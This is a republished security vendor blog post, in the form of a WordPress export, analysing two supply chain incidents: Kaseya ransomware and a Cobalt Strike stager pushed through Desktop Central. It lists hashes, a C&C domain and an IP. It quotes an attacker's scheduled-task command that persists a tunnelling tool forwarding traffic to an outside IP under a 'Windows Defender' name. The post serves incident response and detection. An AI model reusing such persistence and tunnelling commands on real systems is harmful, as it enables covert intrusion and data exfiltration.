{"id":42142,"date":"2021-08-04T00:00:00","date_gmt":"2021-08-04T00:00:00","guid":{"rendered":"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html"},"modified":"2021-08-04T00:00:00","modified_gmt":"2021-08-04T00:00:00","slug":"supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","title":{"rendered":"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-641.png\"><!-- Begin mPulse library --><!-- END mPulse library --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"endpoints,malware,ransomware,research,articles, news, reports\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2021-08-04\"> <meta property=\"article:tag\" content=\"malware\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\"> <title>Supply Chain Attacks from a Managed Detection and Response Perspective<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\"><br \/>\n<meta property=\"og:title\" content=\"Supply Chain Attacks from a Managed Detection and Response Perspective\"><br \/>\n<meta property=\"og:description\" content=\"In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-641.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Supply Chain Attacks from a Managed Detection and Response Perspective\"><br \/>\n<meta name=\"twitter:description\" content=\"In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-641.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.073185303196\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1554465412\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.5\">\n<div class=\"article-details\" role=\"heading\" readability=\"41\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.<\/p>\n<p class=\"article-details__author-by\">By: Ryan Maglaque, Jessie Prevost, Joelson Soares, Janus Agcaoili <time class=\"article-details__date\">August 04, 2021<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"42.394420903955\">\n<div readability=\"32.391242937853\">\n<p>Modern technology has made managing large IT environments much less daunting compared to the past, when each endpoint had to be manually configured and maintained. Many organizations now use tools and IT solutions that allow centralized management of endpoints, making it possible to update, troubleshoot, and deploy applications from a remote location.<\/p>\n<p>However, this convenience comes at a price \u2014 just as IT staff can access machines from a single location, the centralized nature of modern tech infrastructure also means that malicious actors can target the primary hub to gain access to the whole system. &nbsp;Even more concerning, cybercriminals no longer even have to launch a direct attack against an organization \u2014 they can bypass security measures by <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/virtualization-and-cloud\/supply-chain-attacks-cloud-computing\">focusing on their target\u2019s supply chain<\/a>. For example, instead of trying to find weak points in the system of a large organization that will likely have strong defenses, an attacker can instead target smaller companies that develop software for larger enterprises.<\/p>\n<p>In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.<\/p>\n<p>On July 2, during the peak of the <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/it-management-platform-kaseya-hit-with-sodinokibi-revil-ransomwa.html\">Kaseya ransomware incident<\/a>, we alerted one of our customers, notifying them about &nbsp;ransomware detections in their system.&nbsp;&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-1.jpg\" alt=\"Figure 1. The timeline of the incident\"><figcaption>Figure 1. The timeline of the incident<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"35.716326530612\">\n<div readability=\"18.340816326531\">\n<p>Our investigation found suspicious activity when the file AgentMon.exe, which is part of the Kaseya Agent, spawned another file, cmd.exe, that is responsible for creating the payload agent.exe, which in turn dropped MsMpEng.exe<\/p>\n<p>By expanding our root cause analysis (RCA) and checking the argument for cmd.exe, we were able to see a few items before the execution of the ransomware. These initial set of indicators of compromise (IoCs) are similar to the ones discussed in <a href=\"https:\/\/www.huntress.com\/blog\/rapid-response-kaseya-vsa-mass-msp-ransomware-incident\">another blog post<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-2.jpg\" alt=\"Figure 2. Vision One console showing the attack\u2019s infection chain\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-2-2.jpg\" alt=\"Figure 2. Vision One console showing the attack\u2019s infection chain\"><figcaption>Figure 2. Vision One console showing the attack\u2019s infection chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>We found that the malware attempted to disable the anti-malware and anti-ransomware features of Windows Defender via PowerShell commands. It also created a copy of the Windows command line program Certutil.exe to \u201cC:\\Windows\\cert.exe\u201d, which is used to decode the payload file agent.crt, with the output given the name agent.exe. &nbsp;Agent.exe is then used to create the file MsMpEng.exe, a version of Windows Defender that is vulnerable to DLL side-loading.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-3.jpg\" alt=\"Figure 3. Details of the threat\"><figcaption>Figure 3. Details of the threat<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>Machine learning detection capabilities managed to block and detect the ransomware, however, the protection module was not activated in all the security agents of Trend Micro Apex One\u2122 \u2014 so the organization\u2019s support requested the team to check their product settings. Because the process chain showed that the ransomware came from a Kaseya agent, we&nbsp; requested our customer to isolate the Kaseya servers to contain the threat.<\/p>\n<p>A few hours later, Kaseya released a notice to their users to immediately shut down their Virtual System\/Server Administrator (VSA) server until further notice.<\/p>\n<p>The second supply chain incident handled by our MDR team starts with an alert to a customer that notified them of a credential dump occurring in their active directory (AD). The Incident View in Trend Micro Vision One\u2122\ufe0f aggregated other detections into a single view, providing additional information on the scope of the threat. From there, we were able to see a server, an endpoint, and a user related to the threat.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-4.jpg\" alt=\"Figure 4. Vision One\u2019s incident view showing the threat\u2019s details \"><figcaption>Figure 4. Vision One\u2019s incident view showing the threat\u2019s details <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Our threat hunting team also noted suspicious behavior related to WmiExec. Further investigation of the affected hosts\u2019 Ownership Alignment Tools (OATs) show a related entry for persistence:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">C:\\Windows\\System32\\schtasks.exe \/CREATE \/RU SYSTEM \/SC HOURLY \/TN &#8220;Windows Defender&#8221; \/TR &#8220;powershell.exe C:\\Windows\\System.exe -L rtcp:\/\/0.0.0.0:1035\/127.0.0.1:25 -F mwss:\/\/52.149.228.45:443&#8221; \/ST 12:00<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-5.jpg\" alt=\"Figure 5. OAT flagging a suspicious creation of a scheduled task\"><figcaption>Figure 5. OAT flagging a suspicious creation of a scheduled task<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.179425837321\">\n<div readability=\"13.464114832536\">\n<p>We found scheduled tasks being utilized as a persistence mechanism for the file System.exe. Further analysis of this file shows that it is related to <a href=\"https:\/\/github.com\/ginuerzh\/gost\">GO simple tunnel<\/a>, which is used to forward network traffic to an IP address depending on the argument.<\/p>\n<p>Checking the initial alert revealed a file common in the two hosts, which prompted us to check the IOC list to determine the other affected hosts in the environment.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-6.jpg\" alt=\"Figure 6. Discovery commands and access to a malicious domain evident in the process chain\"><figcaption>Figure 6. Discovery commands and access to a malicious domain evident in the process chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>Expanding the nodes from the RCA allowed us to gather additional IOCs that showed setup0.exe creating the file elevateutils.exe. In addition, elevateutils.exe was seen querying the domain vmware[.]center, which is possibly the threat\u2019s command-and-control (C&amp;C) server. We also discovered the earliest instance of setup0.exe in one of the hosts.<\/p>\n<p>The samples setup0.exe is an installer for elevateutils.exe which seems to be a Cobalt Strike Beacon Malleable C&amp;C stager based on our analysis. The installer may have been used to masquerade as a normal file installation.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-7.jpg\" alt=\"Figure 7. The presence of EICAR strings is an indicator of it being of elevateutils.exe being a Cobalt Strike Beacon\"><figcaption>Figure 7. The presence of EICAR strings is an indicator of it being of elevateutils.exe being a Cobalt Strike Beacon<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.5\">\n<div readability=\"34\">\n<p>The stager elevateutils.exe: will try to load the DLL chartdir60.dll, which will in turn read the contents of manual.pdf (these are also dropped by the installer in the same directory as elevateutil.exe). It will then decrypt, load, and execute a shell code in memory that will access the URL vmware[.]center\/mV6c.<\/p>\n<p>It makes use of VirtualAlloc, VirtualProtect, CreateThread, and a function to decrypt the shellcode to load and execute in memory. It also uses indirect API calls after decryption in a separate function, then uses JMP EAX to call the function as needed, which is not a routine or behavior that a normal file should have.<\/p>\n<p>Since it\u2019s possible that this is a Cobalt Strike Malleable C&amp;C stager, further behaviors may be dependent on what is downloaded from the accessed URL. However, due to being inaccessible at the time of writing this blog post, we were unable to observe and\/or verify other behaviors.<\/p>\n<p>Use of the Progressive RCA of Vision One allowed us to see how elevateutils.exe was created, as well as its behaviors. The malicious file was deployed via a Desktop Central agent.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-8.jpg\" alt=\"Figure 8. Viewing the behaviors of elevateutils.exe\"><figcaption>Figure 8. Viewing the behaviors of elevateutils.exe<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-9.jpg\" alt=\"Figure 9. The console showing the attack\u2019s infection chain \"><figcaption>Figure 9. The console showing the attack\u2019s infection chain <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"45.522190745987\">\n<div readability=\"36.61567516525\">\n<p>Based on these findings, our recommendation to the customer was to check the logon logs of the affected application to verify any suspicious usage of accounts during the time the threat was deployed.<\/p>\n<p>By closely monitoring the environment, the threat was stopped after the credential dump. Furthermore, the IOCs (IP addresses and hashes) were added to the suspicious objects list to block them while waiting for detections. Further monitoring was done and no other suspicious behavior were seen.<\/p>\n<p>As businesses become more interconnected, a successful supply chain attack has the potential to cause a significant amount of damage to affected organizations. &nbsp;We can expect to see more of these in the future, as they often lead to the same results as a direct attack while providing a wider attack surface for malicious actors to exploit.<\/p>\n<p>Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what\u2019s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. For example, products and software may have configurations \u2014 such as folder exclusions and suboptimal implementation of detection modules \u2014 that make threats more difficult to notice.<\/p>\n<p>Security audits are also a very important step in securing the supply chain. &nbsp;Even if third party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.<\/p>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_ph\/business\/products\/detection-response.html\">Trend Micro Vision One<\/a> provides offers organizations the ability to detect and respond to threats across multiple security layers. It provides enterprises options to deal with threats such as the ones discussed in this blog entry:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">It can Isolate endpoints, which are often the source of infection, until they are fully cleaned or the investigation is done.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">It can block IOCs related to the threat, this includes hashes, IP addresses, or domains found during analysis.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">It can collect files for further investigation.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><span class=\"body-subhead-title\">Indicators of Compromise (IoCs)<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Incident # 1<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h2><span class=\"body-subhead-title\">&nbsp;<\/span><\/h2>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"4\">\n<tr>\n<td width=\"384\" valign=\"top\">\n<p><b>SHA256<\/b><\/p>\n<\/td>\n<td width=\"174\" valign=\"top\">\n<p><b>Detection name<\/b><\/p>\n<\/td>\n<td width=\"65\" valign=\"top\">\n<p><b>Details<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"384\" valign=\"top\" readability=\"5\">\n<p>8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd<\/p>\n<\/td>\n<td width=\"174\" valign=\"top\" readability=\"5\">\n<p>Ransom.Win32.SODINOKIBI.YABGC<\/p>\n<\/td>\n<td width=\"65\" valign=\"top\">\n<p>mpsvc.dll<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"384\" valign=\"top\" readability=\"5\">\n<p>d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e<\/p>\n<\/td>\n<td width=\"174\" valign=\"top\" readability=\"5\">\n<p>Trojan.Win32.SODINSTALL.YABGC<\/p>\n<\/td>\n<td width=\"65\" valign=\"top\">\n<p>agent.exe<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Incident # 2<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"5\">\n<tr>\n<td width=\"417\" valign=\"top\">\n<p><b>SHA256<\/b><\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p><b>Detection name<\/b><\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p><b>Details<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>5e0f28bd2d49b73e96a87f5c20283ebe030f4bb39b3107d4d68015dce862991d<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>HackTool.Win64.Gost.A<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>System.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>116af9afb2113fd96e35661df5def2728e169129bedd6b0bb76d12aaf88ba1ab<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>&nbsp;Trojan.Win32.COBALT.AZ<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>Setup0.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>f52679c0a6196494bde8b61326d753f86fa0f3fea9d601a1fc594cbf9d778b12<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.Win32.COBALT.BA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>chartdir60.dll<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>c59ad626d1479ffc4b6b0c02ca797900a09553e1c6ccfb7323fc1cf6e89a9556<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.PDF.COBALT.AA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>manual.pdf<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>f4f25ce8cb5825e0a0d76e82c54c25a2e76be3675b8eeb511e2e8a0012717006<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.Win32.COBALT.BA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>elevateutils.exe<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<h3><span class=\"body-subhead-title\">IP addresses and domains<\/span><\/h3>\n<ul>\n<li><span class=\"rte-red-bullet\">185[.]215[.]113[.]213<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vmware[.]center<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":42143,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9513,9539,9509],"class_list":["post-42142","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-04T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1428\" \/>\n\t<meta property=\"og:image:height\" content=\"446\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst\",\"datePublished\":\"2021-08-04T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"},\"wordCount\":1639,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\",\"name\":\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"datePublished\":\"2021-08-04T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity 